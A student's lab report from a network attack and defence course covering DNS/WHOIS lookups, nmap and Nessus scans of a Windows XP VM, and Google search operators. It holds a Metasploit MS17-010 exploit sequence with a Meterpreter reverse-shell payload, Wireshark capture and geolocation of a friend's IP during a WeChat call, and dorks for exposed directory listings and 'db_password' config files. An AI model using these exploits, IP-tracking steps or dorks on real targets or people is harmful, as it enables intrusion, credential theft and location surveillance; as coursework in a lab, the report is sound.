20222409 2024-2025-1 《网络与系统攻防技术》实验五实验报告

news/2024/11/29 22:52:19/文章来源:https://www.cnblogs.com/20222409wqb/p/18566324

1.实验内容

1.1 本周学习内容

本周学习了信息收集与渗透测试相关技术,主要包括Metasploit、nmap和Nessus的使用。

  • Metasploit是渗透测试框架,能提供多种攻击模块,如远程代码执行、提权和后渗透功能(如键盘记录、文件操作等),可用于模拟攻击和漏洞利用;
  • nmap被用于扫描目标主机的端口和服务,识别其操作系统及运行的服务;
  • Nessus则用于漏洞扫描,发现目标主机的安全漏洞并进行风险评估。

1.2 实践内容

1.2.1 从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

  • DNS注册人及联系方式
  • 该域名对应IP地址
  • IP地址注册人及联系方式
  • IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)

1.2.2 尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

1.2.3 使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

  • 靶机IP地址是否活跃
  • 靶机开放了哪些TCP和UDP端口
  • 靶机安装了什么操作系统,版本是多少
  • 靶机上安装了哪些服务

1.2.4 使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

  • 靶机上开放了哪些端口
  • 靶机各个端口上网络服务存在哪些安全漏洞
  • 你认为如何攻陷靶机环境,以获得系统访问权

1.2.5 个人信息搜集

  • 通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
  • 练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

2.实验过程

2.1 域名信息查询

本模块的核心任务是通过对域名(如www.besti.edu.cn)的多角度查询,掌握目标系统的基础网络信息,包括DNS注册信息、对应的IP地址以及IP归属地等。我们将利用命令行工具和在线平台,逐步完成以下任务。
结论如表1所示:

类别 信息内容
DNS 注册人及联系方式 注册人组织: 北京百度网讯科技有限公司 (Beijing Baidu Netcom Science Technology Co., Ltd.)
注册机构: MarkMonitor Inc.
电话: +1.2086851750
邮箱: abusecomplaints@markmonitor.com
该域名对应 IP 地址 IP 地址 1: 39.156.66.10
IP 地址 2: 110.242.68.66
IP 地址注册人及联系方式 IP 地址 1 (39.156.66.10):
注册人: Haijun Li
注册组织: China Mobile Communications Corporation
电话: +86 1052686688
传真: +86 10 52616187
邮箱: hostmaster@chinamobile.com
滥用投诉邮箱: abuse@chinamobile.com

IP 地址 2 (110.242.68.66):
注册人: Kong Lingfei
注册组织: China Unicom Hebei Province Network
电话: +86-311-86681601
传真: +86-311-86689210
邮箱: konglf5@chinaunicom.cn
滥用投诉邮箱: zhaoyz3@chinaunicom.cn
IP 地址所在国家、城市和具体地理位置 IP 地址 1 (39.156.66.10):
国家: 中国 (CN)
城市: 北京 (Beijing)
区域: 北京 (Beijing)
经纬度: 39.9075, 116.3972
邮编: 100000
具体地址: 29, Jinrong Ave., Xicheng District, Beijing, 100032

IP 地址 2 (110.242.68.66):
版本 1 (WHOIS 查询):
国家: 中国 (CN)
城市: 石家庄市 (Shi Jiazhuang City)
具体地址: 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011
版本 2 (opengps 查询):
国家: 中国 (CN)
城市: 保定市 (Baoding)
具体地址: 顺平县平安东大街 幸福社区卫生站南 118 米

表1:DNS查询信息汇总

2.1.1 使用WHOIS查询DNS注册人及联系方式

WHOIS是一种查询域名注册详细信息的标准协议,可用于了解域名注册人、注册机构及相关联系方式。

先输入以下命令(注意没有“www.”),结果如图1:

whois besti.edu.cn


图1:WHOIS查询besti.edu.cn的结果
可能是学院官网进行了保护,那么我们换个网站,结果如图2

whois baidu.com


图2:WHOIS查询baidu.com的结果

易知DNS注册人及联系方式:

  • 注册人组织:北京百度网讯科技有限公司(Beijing Baidu Netcom Science Technology Co., Ltd.)
  • 注册机构:MarkMonitor Inc.
  • 联系方式-电话:+1.2086851750
  • 联系方式-电子邮件:abusecomplaints@markmonitor.com

2.1.2 使用DIG查询域名对应的IP地址

DIG是一种灵活的DNS查询工具,可用于获取域名的DNS记录,包括A记录、CNAME记录等。
执行以下命令(注意没有“www.”)查询域名的对应的IP地址,结果如图3:

dig baidu.com


图3:使用DIG查询baidu.com的IP地址

从DIG查询结果的ANSWER SECTION中提取到以下该域名对应IP地址:

  • 39.156.66.10
  • 110.242.68.66

2.1.3 使用NSLOOKUP验证获取的IP地址

输入以下命令,结果如图4所示:

nslookup baidu.com


图4:使用NSLOOKUP查询baidu.com的IP地址
从NSLOOKUP的输出中提取到以下IP地址(同2.1.2):

  • 39.156.66.10
  • 110.242.68.66

2.1.4 使用WHOIS查询IP地址注册信息

  1. 查询IP地址39.156.66.10
whois 39.156.66.10


图5:WHOIS查询IP地址39.156.66.10的注册信息
可以提取到以下内容:
IP注册人:Haijun Li
联系方式:

  • 电话:+86 1052686688
  • 传真:+86 10 52616187
  • 邮箱:hostmaster@chinamobile.com
  • 滥用投诉邮箱:abuse@chinamobile.com

IP地址所在国家、城市和具体地理位置:

  • 国家:中国(CN)
  • 城市:北京(Beijing)
  • 地址:China Mobile Communications Corporation, 29, Jinrong Ave., Xicheng District, Beijing, 100032
  1. 查询IP地址110.242.68.66
whois 110.242.68.66


图6:WHOIS查询IP地址110.242.68.66的注册信息
可以提取到以下内容:
注册人:Kong Lingfei
联系方式:

  • 邮箱:konglf5@chinaunicom.cn
  • 电话:+86-311-86681601
  • 传真:+86-311-86689210
  • 滥用投诉邮箱:zhaoyz3@chinaunicom.cn
    IP地址所在国家、城市和具体地理位置:
  • 国家:中国(CN)
  • 省份:河北省(Hebei Province)
  • 城市:石家庄市(Shi Jiazhuang City)
  • 地址:China Unicom Hebei province network, 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011

2.1.5 使用TRACEROUTE跟踪网络路由

在Linux系统中输入:

traceroute baidu.com


图7:使用TRACEROUTE跟踪baidu.com的路由
第1跳为本地网络设备,IP地址为192.168.222.2,响应时间正常。
第2~30跳均显示***,未返回任何路由节点信息。
推测中间节点可能被防火墙或路由策略屏蔽,限制了探测包的响应。

或在Windows系统中输入:

tracert baidu.com


图8:使用TRACERT跟踪baidu.com的路由
数据包从本地网关(192.168.50.1)出发,经过多个路由节点到达目标(39.156.66.10)。其中,网络路径部分受限(显示“请求超时”)但未完全阻断。

2.1.6 使用在线工具获取IP地址注册人及地理位置

  1. 查询IP地址39.156.66.10
    访问ipinfo,输入IP地址39.156.66.10:

    图9:使用在线工具查询IP地址39.156.66.10的地理位置
    查询得信息
    注册人:China Mobile Communications Corporation
    联系方式:
    地址:29, Jinrong Ave., Xicheng District, Beijing, 100032
    国家:中国(CN)
    邮箱:abuse@chinamobile.com
    电话:+000000000(占位符,实际电话号码未公开)
    国家:中国(CN)
    城市:北京(Beijing)
    区域:北京(Beijing)
    经纬度:39.9075,116.3972
    邮编:100000

  2. 查询IP地址110.242.68.66
    访问opengps,输入IP地址110.242.68.66,查询得信息:

    图10:使用在线工具查询IP地址110.242.68.66的地理位置
    发现位置和使用whois 110.242.68.66查询得到的不一致
    国家:中国(CN)
    省份:河北省
    城市:保定市
    具体地址:顺平县平安东大街 幸福社区卫生站南118米

2.2 获取好友的IP地址和具体地理位置

2.2.1 获取好友的IP地址

开启wireshark,给微信好友打语音电话
在过滤器中输入与微信相关的流量规则

udp && ip.addr==192.168.50.16

以下是wireshark抓包截图

图11:Wireshark抓取微信语音电话的IP地址
以下是在站长工具箱查询到的具体地址

图12:使用站长工具查询IP地址211.90.238.71的地理位置

查询得对方IP地址为211.90.238.71,地理位置为浙江杭州,与其真实地理位置相符。且圆圈范围为杭州主城区,圆心为西溪湿地附近。
图13为浙大在杭州主城区的校区分布图。可见圆圈包括了浙大紫金港校区,即同学所在地。

图13:浙江大学主要校区分布图
在iplocation.net多源IP数据查询网站上查看,大多结果为杭州,进一步验证了正确性。

2.3 使用Nmap开源软件对靶机环境进行扫描

选择windows xp pro为靶机,ip为192.168.222.139
选择kali linux为攻击机,ip为192.168.222.130
结果如表2所示:

问题 结果
靶机IP地址是否活跃 是,靶机 IP 地址 192.168.222.139 活跃,显示 Host is up (0.00060s latency)
靶机开放了哪些TCP端口 135/tcp(msrpc),139/tcp(netbios-ssn),445/tcp(microsoft-ds)。
靶机开放了哪些UDP端口 123/udp(NTP),137/udp(NetBIOS 名称服务),
开放或过滤:138/udp(NetBIOS 数据报服务),445/udp(Microsoft-DS),500/udp(ISAKMP),1025/udp(Blackjack),1900/udp(UPnP),4500/udp(NAT-T IKE)。
靶机安装了什么操作系统,版本是多少 Windows 2000(SP2 - SP4),Windows XP(SP2 - SP3),Windows Server 2003(SP0 - SP2)。
靶机上安装了哪些服务 25/tcp(tcpwrapped),110/tcp(tcpwrapped)。

表2: Nmap扫描结果汇总

2.3.1 靶机IP地址是否活跃

使用以下命令对靶机进行Ping扫描:

nmap -sn 192.168.222.139

命令说明:

  • -sn:启用Ping扫描,仅进行主机发现,不扫描端口


图14:Nmap执行Ping扫描结果,靶机活跃
输出显示Host is up (0.00060s latency),靶机IP地址192.168.222.139是活跃的

2.3.2 靶机开放了哪些TCP和UDP端口

在确认靶机在线之后,下一步是对靶机的TCP和UDP端口进行扫描

  1. TCP端口扫描
    使用-sS参数进行SYN扫描:
nmap -sS 192.168.222.139


图15:Nmap扫描靶机TCP端口结果
可见靶机开放了以下TCP端口:135、139、445
开放的TCP端口对应以下服务:

  • 135/tcp:msrpc(Microsoft RPC 服务)
  • 139/tcp:netbios-ssn(NetBIOS Session 服务)
  • 445/tcp:microsoft-ds(Microsoft-DS 服务)
  1. UDP端口扫描
    使用-sU参数进行UDP扫描:
nmap -sU 192.168.222.139


图16:Nmap扫描靶机UDP端口结果
可见靶机开放了以下UDP端口:123、137
开放或过滤了以下UDP端口:138、445、500、1025、1900、4500。
UDP端口对应以下服务:

  • 123/udp:NTP(网络时间协议)
  • 137/udp:NetBIOS 名称服务
  • 138/udp:NetBIOS 数据报服务
  • 445/udp:Microsoft-DS(用于文件和打印共享)
  • 500/udp:ISAKMP(互联网密钥交换协议)
  • 1025/udp:Blackjack(未知服务)
  • 1900/udp:UPnP(通用即插即用)
  • 4500/udp:NAT-T IKE(网络地址转换穿透)

2.3.3 靶机安装了什么操作系统,版本是多少

nmap -O 192.168.222.139


图17:Nmap 执行操作系统识别的结果
可见,靶机安装的操作系统和版本可能为:

  • Windows 2000(SP2 - SP4)
  • Windows XP(SP2 - SP3)
  • Windows Server 2003(SP0 - SP2)

出现多个操作系统版本的原因,主要是因为Nmap的操作系统识别是基于对目标主机网络行为的推测。Nmap会尝试通过分析目标主机响应的特征(例如端口开放情况、响应时间、特定协议的实现方式等)来猜测可能的操作系统。但这些特征往往具有相似性,不同版本的操作系统,尤其是同一厂商的不同版本,可能会展现出类似的网络行为和协议响应,因此Nmap无法精确区分每个版本。

2.3.4 靶机上安装了哪些服务

nmap -sV 192.168.1.180


图18:Nmap扫描靶机安装服务的结果
Nmap扫描结果显示靶机上安装了以下服务:

  • 25/tcp:tcpwrapped
  • 110/tcp:tcpwrapped

2.4 使用Nessus开源软件对靶机环境进行扫描

历经千辛万苦,安装好了nessus
与2.3一样:
选择windows xp pro为靶机,ip为192.168.222.139
选择kali linux为攻击机,ip为192.168.222.130

2.4.1 靶机上开放了哪些端口

在Nessus控制台中,点击右上角的New Scan按钮,进入新建扫描界面。
在扫描模板中选择Host Discovery模板。
在扫描配置界面,输入扫描任务的名称。在Targets字段中,输入靶机的IP地址192.168.222.139
其他参数,保持默认设置即可。

图19:Nessus扫描任务配置
配置完成后,点击Launch按钮开始扫描。

图20:Nessus执行主机发现扫描的结果
扫描完成后,Nessus会展示目标主机的开放端口。可以看到靶机的端口123,135,137,139,445开放。

2.4.2 靶机各个端口上网络服务存在哪些安全漏洞

在Nessus控制台中,点击New Scan按钮,选择Advanced Scan模板。
其他步骤和2.4.1大同小异

图21:Nessus执行高级扫描的漏洞发现结果
扫描结果显示,靶机的445端口上运行着SMB服务,且存在MS17-010、MS08-067和MS09-001已知漏洞,靶机的135端口上运行RPC服务,139端口上开放NetBIOS,均可能受到未修补漏洞的影响。

2.4.3 如何攻陷靶机环境,以获得系统访问权

可以利用MS17-010 EternalBlue漏洞
输入以下命令

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.222.139
set LHOST 192.168.222.130
set PAYLOAD windows/meterpreter/reverse_tcp
run

最后,输入ipconfigsysinfo进行验证,确认获取了系统访问权

图22:MS17-010 EternalBlue漏洞验证结果

2.5 个人信息搜集与隐私泄漏检查

2.5.1 通过搜索引擎搜索自己在网上的足迹,并确认隐私和信息泄漏问题

在谷歌中搜索我的名字,搜出的都是同名的,没有我的个人隐私和信息

图23:谷歌搜索自己名字结果

接着搜索学号,除了实验报告外,搜出的基本是不相干的,

图24:谷歌搜索学号结果

搜索手机号,没有相关信息,但在百度中居然能识别出是温州的号码,如图25所示:

图25:百度搜索手机号结果

搜索邮箱,谷歌中没有任何搜索结果。百度中搜索结果如图26所示,没有搜到有用的信息。

图26:百度搜索邮箱结果v

接下来,更换搜索引擎,结果大同小异。

2.5.2 练习使用Google Hack技术完成信息搜集(至少10种搜索方法)

  1. site:限定搜索结果来源于特定网站
site:besti.edu.cn 王志强


图26:使用site限定搜索来源于学校官网的信息
限定来源于学校官网搜索到的老师的信息

  1. filetype:限定搜索文件类型
filetype:pdf "王勤博"


图27:使用filetype限定搜索PDF文件,查找包含“王勤博”的内容
逆天了,居然搜出了以前生竞的陈年旧事。

  1. inurl: 搜索URL中包含指定关键词的页面
inurl:login


图28:使用inurl搜索包含“login”的URL页面

  1. intitle:查找网页标题中包含特定关键词的页面
    尝试查找标题中包含“index of”关键词的页面,寻找暴露的目录索引页面
intitle:"index of"


图29:使用intitle查找包含“index of”的网页标题
可见有两个网站暴露了目录索引页面,且点进去后确实是目录索引页。

  1. intext: 查找网页内容中包含特定关键词的页面
intext:"网鼎杯""北京电子科技学院""第四届"


图30:使用intext搜索包含“网鼎杯”和“北京电子科技学院”的网页内容
真能搜到我们啊

  1. allintitle: 查找标题中同时包含多个关键词的页面
    动动手指,关注下美国大选
allintitle:特朗普 哈里斯


图31:使用allintitle查找包含“特朗普”和“哈里斯”的网页标题

  1. "":引号精确匹配
    先看没有精准匹配的版本

    图32:未使用引号精确匹配搜索内容
    可以看到非常逆天,错别字都看不出来


图33:使用引号精确匹配搜索内容

加上引号后就不犯病了。甚至还搜出了我的同名抖音,樂。

  1. link:查找所有指向指定页面的外部链接
    来找找指向游戏“鸣潮”官网的链接吧
link:mc.kurogames.com


图34:使用link查找指向“鸣潮”官网的外部链接

  1. ext:限定搜索特定类型的网页扩展名
    搜索 .conf配置文件中包含"db_password"关键词的文件,找找有没有笨蛋不做安全保护的
ext:conf "db_password"


图35:使用ext搜索.conf配置文件中包含“db_password”的内容
好吧,事实证明并没有

  1. -: 排除包含特定关键词的结果
王勤博 -足协 -专家 -电气 -facebook -企业 -记者 -youtube -医科 -领英 -名字 -设计 -铁路 -困难 -梅西 -中等职业 -瘟神 -书记 -河北 -山西 -政府 -开发区 -助学 -宝贝 -越野 -椒江 -机车

真服了,我这名字有这么大众?排除这么多才搜到我的信息?

图36:使用-排除无关信息

  1. 通配符*:填补你在搜索时不确定或不完整的部分
how to * money

可见非常聪明,猜到了我想搜的 make,earn

图37:使用*通配符搜索不确定的关键词

  1. ..:搜索特定区间内的数字
    想要搜索北京人均价格100-500的海鲜餐厅
"北京""海鲜" "人均"100..500

搜出来的结果基本符合期望,搜索效果和在小红书比怎么样另说。

图38:使用..搜索价格区间内的海鲜餐厅

  1. before/after:限定日期
    搜搜李子柒复出后,日期的格式为yyyy-mm-dd
李子柒 after:20241001


图39:使用after限定日期进行信息筛选

3.问题及解决方案

  • 问题1:更新插件时出现"Nessus is offline and cannot do software updates via the feed.",导致nessus中"no plugins"

    图40:Nessus 更新插件时出现离线错误的截图
  • 问题1解决方案:先运行命令./nessuscli fetch -register-offline nessus.license
    ,再运行命令./nessuscli update all-2.0.tar.gz。按照这个顺序多试几次。
  • 问题2:多次安装nessus失败后,Kali的图形化界面消失,只剩黑屏
  • 问题2解决方案:试了很多教程不行,重装解决。
  • 问题3:2.4.3中利用MS17-010 EternalBlue漏洞时,遇到了错误
[-] 192.168.222.139:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
  • 问题3解决方案:这是因为使用的MS17-010 EternalBlue漏洞模块只支持64位的系统,而你的靶机是32位的Windows XP。只需将使用的模块改为use exploit/windows/smb/ms17_010_psexec即可。

4.学习感悟、思考等

通过本次实验,我掌握了信息搜集、漏洞利用和渗透测试的基本过程。从使用nmap和whois等工具获取目标信息,到通过Metasploit利用MS17-010漏洞进行攻击,体验了攻击的全流程。在实验中,我认识到攻击需要根据目标环境选择合适的漏洞模块,针对32位系统采用不同的攻击方法。实验加深了我对渗透测试的理解,提升了我分析扫描结果和选择攻击手段的能力。

参考资料

  • nessus快速安装使用指南(非常详细)零基础入门到精通,收藏这一篇就够了
  • kali更新后出现黑屏,右上角出现光标闪烁不能开机的情况
  • Nessus Agent Updates for Offline host

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/843721.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

gin, gorm快速入门

Gin Gin入门 gin的学习要点如何定义路由:包括参数路由、通配符路由 如何处理输入输出 如何使用middleware解决AOP问题在 Gin 里面,用 Engine 来监听一个端口,是一个逻辑上的服务器。 一个 Go 进程可以创建多个 Engine。 hello, world 使用步骤:在应用中引入 Gin 依赖:go g…

20222424 2021-2022-2 《网络与系统攻防技术》实验七实验报告

20222424 2021-2022-2 《网络与系统攻防技术》实验七实验报告 1.实验内容 1.1本周学习内容Web安全基础/前后端 SQL注入原理 XSS脚本攻击 CSRF漏洞1.2实验内容及要求 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有 (1)简单应用SET…

【探讨】批量操作以及多线程下保证事务的一致性

1 前言 假如给你一个场景,有一批1万或者10万的数据,让你插入到数据库中怎么做呢?我们这节来看看。 首先一点我们单纯的 一个个 INSERT 语句,我们就不试了,这一个个的肯定慢,我们这里统一用 INSERT INTO 表(字段1,字段2) VALUES(值1,值2),(值11,值22),(值111,值222);…

Windows mstsc 远程桌面链接 ubuntu 18.04 远程图形桌面

前言全局说明通常情况下,管理 Ubuntu 服务器都是用命令行界面,但某些时候,可能会用到图形界面。2204安装方法:https://www.cnblogs.com/wutou/p/18430133 命令行安装图形界面:https://www.cnblogs.com/wutou/p/18572907一、说明 环境: Ubuntu 18.04.6 LTS (Linux qt-vm 5…

[杂题]2024.9~2024.11 杂题总结

[杂题]2024.9~2024.11 杂题总结 题目做多了,不总结,和没做是一样的。 ARC061B 挺好的一道题。观察到三个不好做,我们想能否搞成一个牌堆去取。发现显然是可以的,我们只需要知道一个确定的取出来牌的编号序列,必然可以确定三者的牌堆分别是什么。 所以,问题转换成了:有多…

E. Photoshoot for Gorillas(Codeforces Round 966 (Div. 3))

https://codeforces.com/contest/2000/problem/E 题目描述 你非常喜欢屮大猩猩,于是你决定为它们组织一次拍摄活动。大猩猩生活在丛林中,丛林被表示为一个有 n 行 m 列的网格,有 w 个大猩猩同意参与拍摄,第 i 个大猩猩的身高ai .你希望将所有大猩猩放置在网格的单元格中,并…

windows版lammps的安装和计算

1.安装:详情见:https://mp.weixin.qq.com/s/xwx0c2ATNM0pphaHwDLkmQ 2.提交计算task的命令: mpiexec -np 4 lmp -in xxx.in #其中xxx.in表示in文件的名称,详情见 https://mp.weixin.qq.com/s/i6fa7xTKjlgSirPm0cj_4w 3.将MS的car和mdf文件导出data文件的方法:(命令…

第三十八讲:自增主键为什么不是连续的

你现在可以不懂,但以后面试的时候,必须要知道的三个关于自增主键的点 第一:唯一键冲突和事务回滚是导致自增主键不连续的两种大原因,此外批量插入数据的语句,MySQL 批量申请自增 id 的策略也是一个隐藏原因 第二:MySQL设计中不允许自增值回退的原因,主要是为了提升性能还…

NOIP 2024 退役记

人生有梦,各自精彩。Day -??? 摆疯了,啥也没复习,猫国建设者真好玩。 Day 0 昨晚回家结果摆到两点,感觉要在 noip 考场上睡着了/shui。早上没起来,迟到了/kk。 上午没怎么复习,摆摆摆,哎哎哎。 中午疯狂看小说,败犬太好看辣! 下午出发淄博。路上一直在睡觉,后悔没…

MySQL底层概述—4.InnoDB数据文件

大纲 1.表空间文件结构 (1)表空间Tablesapce (2)段Segment (3)区Extend (4)页Page (5)行Row 2.Page结构 (1)页结构各部分说明 (2)页结构整体划分 3.行记录格式 (1)行格式分类 (2)COMPACT行记录格式 (3)Compact中的行溢出机制 (4)其他行格式记录1.表空间文件结构 (1)表空间Table…

gin

Gin Gin入门 gin的学习要点如何定义路由:包括参数路由、通配符路由 如何处理输入输出 如何使用middleware解决AOP问题在 Gin 里面,用 Engine 来监听一个端口,是一个逻辑上的服务器。 一个 Go 进程可以创建多个 Engine。 hello, world 使用步骤:在应用中引入 Gin 依赖:go g…

MySQL底层概述—3.InnoDB线程模型

大纲 1.InnoDB的线程模型 2.IO Thread 3.Purge Thread 4.Page Cleaner Thread 5.Master Thread1.InnoDB的线程模型 InnoDB存储引擎是多线程的模型,因此其后台有多个不同的后台线程,负责处理不同的任务。后台线程的作用一:负责刷新内存池中的数据,保证缓冲池中的内存缓存是最…